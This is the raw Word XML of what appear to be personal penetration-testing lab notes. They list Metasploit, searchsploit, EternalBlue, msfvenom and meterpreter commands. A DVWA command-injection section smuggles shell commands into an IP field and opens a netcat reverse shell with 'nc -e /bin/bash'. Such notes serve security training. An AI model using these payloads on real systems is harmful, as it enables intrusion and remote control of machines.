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lastRenderedPageBreak/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CL: show payploads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>CL: nc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Searchsploit Linux tetnetd</w:t>
            </w:r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 Linux telnetd</w:t>
            </w:r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{ipaddress}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>CL: searchsploit samba</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4442DECD" w14:textId="1843B767" w:rsidR="00C72950" w:rsidRDefault="00C72950" w:rsidP="00C72950">
            <w:r>
              <w:t>CL: searchs samba</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DF98B8" w14:textId="25FE463C" w:rsidR="00A14902" w:rsidRDefault="00A14902" w:rsidP="00C72950">
            <w:r>
              <w:t>CL: use auxiliary/scanner/smb/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auxiliary/scanner/smb/smb_version</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440ADE75" w14:textId="098027C7" w:rsidR="00032FF6" w:rsidRDefault="00032FF6" w:rsidP="00F17F9E">
            <w:r>
              <w:t>CL: use auxiliary/scanner/smb/{VERSION}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>CL: searchsploit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auxiliary/scanner/ssh/ssh_login</w:t>
            </w:r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{filepath}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>CL: ssh msfadmin@{IPADDRESS}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windows/meterpreter/reverse_tcp</w:t>
            </w:r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>CL: search eternalblue</w:t>
            </w:r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r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>DoublePulsar</w:t>
            </w:r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r>
              <w:t>Sudo su</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58EF5CC2" w14:textId="119D40CD" w:rsidR="00B16D4D" w:rsidRDefault="00B16D4D" w:rsidP="00B2773E">
            <w:r>
              <w:t>Sudo dpkg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r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>BlueKeep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r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Routersploit</w:t>
            </w:r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>Follow the instructions in github</w:t>
            </w:r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cd routersploit</w:t>
            </w:r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scanners/autopwn</w:t>
            </w:r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>Gaining Access(Viruses,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>Note: msfvenom</w:t>
            </w:r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>CL: msfvenom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r>
              <w:t>CL:msfvenom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msfvenom –list venom</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027C5AC5" w14:textId="312719D9" w:rsidR="003F3FA1" w:rsidRDefault="00A15148" w:rsidP="00E15CBD">
            <w:r>
              <w:t>CL: msfvenom –list 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>Veil – generating powershell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>Note: fatrat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r>
              <w:t>getuid</w:t>
            </w:r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>CL meterpreter</w:t>
            </w:r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>CL: pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD4FA56" w14:textId="7F52B145" w:rsidR="004428AE" w:rsidRDefault="004428AE" w:rsidP="0075504F">
            <w:r>
              <w:t>CL: dir</w:t>
            </w:r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>Some of the command in, when your in windows 10 machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4593CCD5" w14:textId="77777777" w:rsidR="00E85572" w:rsidRDefault="00E85572" w:rsidP="00E85572">
            <w:r>
              <w:t>&gt;download {fileName}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>upload {fileName}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>&gt;search bypassuac – user account control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5234C9" w14:textId="061BF11B" w:rsidR="0001470E" w:rsidRDefault="0001470E" w:rsidP="0001470E">
            <w:r>
              <w:t>&gt;search 2020 – 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107614" w14:paraId="225F68E2" w14:textId="77777777" w:rsidTr="004A4E7A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6F8A294D" w14:textId="1CD329C3" w:rsidR="00107614" w:rsidRPr="00C459B9" w:rsidRDefault="00107614" w:rsidP="00BC7667">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C459B9">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Website Application Penetration</w:t>
            </w:r>
          </w:p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3427E7A4" w14:textId="569BD97D" w:rsidR="009E14E3" w:rsidRDefault="00FE16C1" w:rsidP="009E14E3">
            <w:r>
              <w:t>&lt;dirb</w:t>
            </w:r>
            <w:r w:rsidR="006A130C">
              <w:t xml:space="preserve">     ----</w:t>
            </w:r>
            <w:r w:rsidR="006A130C">
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="006A130C">
              <w:t xml:space="preserve"> Find directory in the website</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0CB634" w14:textId="2032AA41" w:rsidR="007C7509" w:rsidRDefault="007C7509" w:rsidP="009E14E3">
            <w:r>
              <w:t xml:space="preserve">&lt;dirb </w:t>
            </w:r>
            <w:hyperlink w:history="1">
              <w:r w:rsidR="00002A1B" w:rsidRPr="00540063">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://{ipaddress}</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4D30C914" w14:textId="70970E4E" w:rsidR="00002A1B" w:rsidRDefault="00002A1B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7884524" w14:textId="3F0BA735" w:rsidR="00B90CD6" w:rsidRDefault="00B90CD6" w:rsidP="009E14E3">
            <w:r>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="536F1DC4" w14:textId="1EFD53E5" w:rsidR="009E14E3" w:rsidRDefault="00841070" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E7943B" w14:textId="4D8F2201" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3">
            <w:r>
              <w:t>Or</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1811B1C7" w14:textId="79DDD3BD" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;nc -lvp 12345</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E10FF8E" w14:textId="4C26FC84" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3">
            <w:r>
              <w:t>Type this in Kali(above) and use this(below)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB22CB4" w14:textId="061A4757" w:rsidR="001D0118" w:rsidRDefault="001D0118" w:rsidP="009E14E3">
            <w:r>
              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392F80AA" w14:textId="3CD68C28" w:rsidR="00C06CD2" w:rsidRDefault="00C06CD2" w:rsidP="009E14E3">
            <w:r>
              <w:t>192.168.1.1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> &amp; ls -la</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDF4BA2" w14:textId="5C17CC9E" w:rsidR="00C75697" w:rsidRDefault="00C75697" w:rsidP="009E14E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D657ECA" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="009E14E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="42DE3672" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="158D67BE" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3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77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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9E14E3" w14:paraId="6410F07C" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DC47658" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34FCDF58" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="0072C714" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E6A3C1" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432513BB" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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9E14E3" w14:paraId="02331C5E" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DB921B7" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="124F2B0C" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="56CFC62A" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD3EDAE" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46521A82" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="1330A494" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BF22A65" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14516F89" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD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79F102C1" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD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77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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9E14E3" w14:paraId="68ED0D52" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49E5E3DD" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="136370DA" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="02AB4150" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6924F07B" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492A9BE3" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3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9E14E3" w14:paraId="0B54BC8F" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B44A511" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="537D5C8F" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="64A93644" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CD26EEC" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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9E14E3" w14:paraId="6FDC81EE" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78884AFA" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB14CD0" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="564C0544" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79717467" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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9E14E3" w14:paraId="3025C01D" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B501EEA" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBEC204" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="3C5D8BCC" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3347D5E7" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E5CFB0" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="526A8782" w14:textId="77777777" w:rsidTr="009E14E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC8EA6C" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D61EDB" w14:textId="77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3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77777777" w:rsidR="009E14E3" w:rsidRDefault="009E14E3" w:rsidP="00E15CBD"/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6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1548644043">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="92751156">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="390814802">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1514765802">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2140680956">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="163429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2A1B"/>
    <w:rsid w:val="000061FC"/>
    <w:rsid w:val="00007E20"/>
    <w:rsid w:val="00013B9D"/>
    <w:rsid w:val="0001470E"/>
    <w:rsid w:val="00021610"/>
    <w:rsid w:val="00025D99"/>
    <w:rsid w:val="00032FF6"/>
    <w:rsid w:val="00042797"/>
    <w:rsid w:val="00056F93"/>
    <w:rsid w:val="00063589"/>
    <w:rsid w:val="000657DE"/>
    <w:rsid w:val="00070596"/>
    <w:rsid w:val="00070EE5"/>
    <w:rsid w:val="00072DA2"/>
    <w:rsid w:val="00075D06"/>
    <w:rsid w:val="00096005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CD7"/>
    <w:rsid w:val="00103F43"/>
    <w:rsid w:val="00107614"/>
    <w:rsid w:val="0011296F"/>
    <w:rsid w:val="0012100A"/>
    <w:rsid w:val="001211B7"/>
    <w:rsid w:val="0012202C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B4489"/>
    <w:rsid w:val="001C0995"/>
    <w:rsid w:val="001C0DEC"/>
    <w:rsid w:val="001C75A9"/>
    <w:rsid w:val="001D0118"/>
    <w:rsid w:val="001D1D49"/>
    <w:rsid w:val="001D2444"/>
    <w:rsid w:val="001E32E3"/>
    <w:rsid w:val="001F6979"/>
    <w:rsid w:val="0022042C"/>
    <w:rsid w:val="00223CF7"/>
    <w:rsid w:val="0022570D"/>
    <w:rsid w:val="00243B6A"/>
    <w:rsid w:val="00244229"/>
    <w:rsid w:val="002522F5"/>
    <w:rsid w:val="00252CE3"/>
    <w:rsid w:val="00262322"/>
    <w:rsid w:val="002646DE"/>
    <w:rsid w:val="002654BD"/>
    <w:rsid w:val="0027188F"/>
    <w:rsid w:val="002851AD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DA1"/>
    <w:rsid w:val="002F2347"/>
    <w:rsid w:val="003035A2"/>
    <w:rsid w:val="0030731F"/>
    <w:rsid w:val="00322F0E"/>
    <w:rsid w:val="0034722B"/>
    <w:rsid w:val="0034744B"/>
    <w:rsid w:val="00377FBA"/>
    <w:rsid w:val="003917BB"/>
    <w:rsid w:val="003960E1"/>
    <w:rsid w:val="00397DBF"/>
    <w:rsid w:val="003A1BBC"/>
    <w:rsid w:val="003B6A08"/>
    <w:rsid w:val="003D1F43"/>
    <w:rsid w:val="003E3F09"/>
    <w:rsid w:val="003E618E"/>
    <w:rsid w:val="003E7148"/>
    <w:rsid w:val="003E71CC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F012B"/>
    <w:rsid w:val="00500FAD"/>
    <w:rsid w:val="00501BCC"/>
    <w:rsid w:val="00502F60"/>
    <w:rsid w:val="00530F2B"/>
    <w:rsid w:val="00532376"/>
    <w:rsid w:val="00532C81"/>
    <w:rsid w:val="005341B8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2304E"/>
    <w:rsid w:val="00640489"/>
    <w:rsid w:val="00654009"/>
    <w:rsid w:val="00660728"/>
    <w:rsid w:val="00662DEE"/>
    <w:rsid w:val="0068341C"/>
    <w:rsid w:val="0068710E"/>
    <w:rsid w:val="00690490"/>
    <w:rsid w:val="0069076C"/>
    <w:rsid w:val="00692AF9"/>
    <w:rsid w:val="006938B3"/>
    <w:rsid w:val="006A130C"/>
    <w:rsid w:val="006A170E"/>
    <w:rsid w:val="006A5E02"/>
    <w:rsid w:val="006A62BE"/>
    <w:rsid w:val="006C2D06"/>
    <w:rsid w:val="006C7652"/>
    <w:rsid w:val="006D0724"/>
    <w:rsid w:val="006D38BA"/>
    <w:rsid w:val="006E568A"/>
    <w:rsid w:val="006F4086"/>
    <w:rsid w:val="006F6E7F"/>
    <w:rsid w:val="00716254"/>
    <w:rsid w:val="00722DF0"/>
    <w:rsid w:val="00727392"/>
    <w:rsid w:val="00730977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B3B4C"/>
    <w:rsid w:val="007B5775"/>
    <w:rsid w:val="007B7B9C"/>
    <w:rsid w:val="007C2C6F"/>
    <w:rsid w:val="007C4354"/>
    <w:rsid w:val="007C46E1"/>
    <w:rsid w:val="007C7509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1070"/>
    <w:rsid w:val="00846066"/>
    <w:rsid w:val="008477D1"/>
    <w:rsid w:val="00851A0B"/>
    <w:rsid w:val="00856627"/>
    <w:rsid w:val="00864A74"/>
    <w:rsid w:val="00866146"/>
    <w:rsid w:val="0089290C"/>
    <w:rsid w:val="00893346"/>
    <w:rsid w:val="008A6748"/>
    <w:rsid w:val="008B78F0"/>
    <w:rsid w:val="008C2727"/>
    <w:rsid w:val="008E5B3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668C"/>
    <w:rsid w:val="00967B2E"/>
    <w:rsid w:val="00975B42"/>
    <w:rsid w:val="009775F5"/>
    <w:rsid w:val="0098065C"/>
    <w:rsid w:val="00991670"/>
    <w:rsid w:val="00992FFC"/>
    <w:rsid w:val="00993B44"/>
    <w:rsid w:val="00995DF6"/>
    <w:rsid w:val="009A09E9"/>
    <w:rsid w:val="009A0BFB"/>
    <w:rsid w:val="009A5270"/>
    <w:rsid w:val="009C37BE"/>
    <w:rsid w:val="009C4C46"/>
    <w:rsid w:val="009E14E3"/>
    <w:rsid w:val="009E7034"/>
    <w:rsid w:val="009F7C90"/>
    <w:rsid w:val="00A12DE5"/>
    <w:rsid w:val="00A13001"/>
    <w:rsid w:val="00A14902"/>
    <w:rsid w:val="00A15148"/>
    <w:rsid w:val="00A26B1C"/>
    <w:rsid w:val="00A336D5"/>
    <w:rsid w:val="00A34F78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F1B41"/>
    <w:rsid w:val="00AF3E1D"/>
    <w:rsid w:val="00AF4F7A"/>
    <w:rsid w:val="00B10F4D"/>
    <w:rsid w:val="00B16D4D"/>
    <w:rsid w:val="00B2773E"/>
    <w:rsid w:val="00B3047A"/>
    <w:rsid w:val="00B33E15"/>
    <w:rsid w:val="00B46A9D"/>
    <w:rsid w:val="00B46F52"/>
    <w:rsid w:val="00B61D63"/>
    <w:rsid w:val="00B631ED"/>
    <w:rsid w:val="00B663DC"/>
    <w:rsid w:val="00B673BE"/>
    <w:rsid w:val="00B80AAB"/>
    <w:rsid w:val="00B81D72"/>
    <w:rsid w:val="00B86313"/>
    <w:rsid w:val="00B86354"/>
    <w:rsid w:val="00B86ACC"/>
    <w:rsid w:val="00B90CD6"/>
    <w:rsid w:val="00BC6F0C"/>
    <w:rsid w:val="00BC7667"/>
    <w:rsid w:val="00BD3BBE"/>
    <w:rsid w:val="00BD4AAC"/>
    <w:rsid w:val="00BD4E0D"/>
    <w:rsid w:val="00BD65C3"/>
    <w:rsid w:val="00BD7CEC"/>
    <w:rsid w:val="00BE12C9"/>
    <w:rsid w:val="00BE2561"/>
    <w:rsid w:val="00BF0B6E"/>
    <w:rsid w:val="00BF3B72"/>
    <w:rsid w:val="00BF3F62"/>
    <w:rsid w:val="00C05080"/>
    <w:rsid w:val="00C06CD2"/>
    <w:rsid w:val="00C10F8B"/>
    <w:rsid w:val="00C14CC4"/>
    <w:rsid w:val="00C212D7"/>
    <w:rsid w:val="00C22E57"/>
    <w:rsid w:val="00C2380F"/>
    <w:rsid w:val="00C2796A"/>
    <w:rsid w:val="00C369A3"/>
    <w:rsid w:val="00C4273C"/>
    <w:rsid w:val="00C43BC5"/>
    <w:rsid w:val="00C43FB0"/>
    <w:rsid w:val="00C459B9"/>
    <w:rsid w:val="00C509FE"/>
    <w:rsid w:val="00C51670"/>
    <w:rsid w:val="00C52647"/>
    <w:rsid w:val="00C62EA3"/>
    <w:rsid w:val="00C65A48"/>
    <w:rsid w:val="00C72950"/>
    <w:rsid w:val="00C75697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5E1F"/>
    <w:rsid w:val="00CE74AF"/>
    <w:rsid w:val="00D11E8D"/>
    <w:rsid w:val="00D15D21"/>
    <w:rsid w:val="00D212F5"/>
    <w:rsid w:val="00D260A7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C192F"/>
    <w:rsid w:val="00DE4484"/>
    <w:rsid w:val="00DF78D7"/>
    <w:rsid w:val="00E05B7D"/>
    <w:rsid w:val="00E233C3"/>
    <w:rsid w:val="00E237E7"/>
    <w:rsid w:val="00E31157"/>
    <w:rsid w:val="00E43DF7"/>
    <w:rsid w:val="00E4694E"/>
    <w:rsid w:val="00E52436"/>
    <w:rsid w:val="00E569C4"/>
    <w:rsid w:val="00E628FA"/>
    <w:rsid w:val="00E62E1A"/>
    <w:rsid w:val="00E744CE"/>
    <w:rsid w:val="00E77408"/>
    <w:rsid w:val="00E77CBD"/>
    <w:rsid w:val="00E81E27"/>
    <w:rsid w:val="00E850B5"/>
    <w:rsid w:val="00E85572"/>
    <w:rsid w:val="00EA58CA"/>
    <w:rsid w:val="00EC64D0"/>
    <w:rsid w:val="00ED3731"/>
    <w:rsid w:val="00EE01DD"/>
    <w:rsid w:val="00EE3AAC"/>
    <w:rsid w:val="00EF173F"/>
    <w:rsid w:val="00EF1FC8"/>
    <w:rsid w:val="00EF6B0F"/>
    <w:rsid w:val="00F12471"/>
    <w:rsid w:val="00F14FAA"/>
    <w:rsid w:val="00F17F9E"/>
    <w:rsid w:val="00F2724A"/>
    <w:rsid w:val="00F344E8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6C1"/>
    <w:rsid w:val="00FE1984"/>
    <w:rsid w:val="00FE36AC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5601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118</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-01T19:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-15T17:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>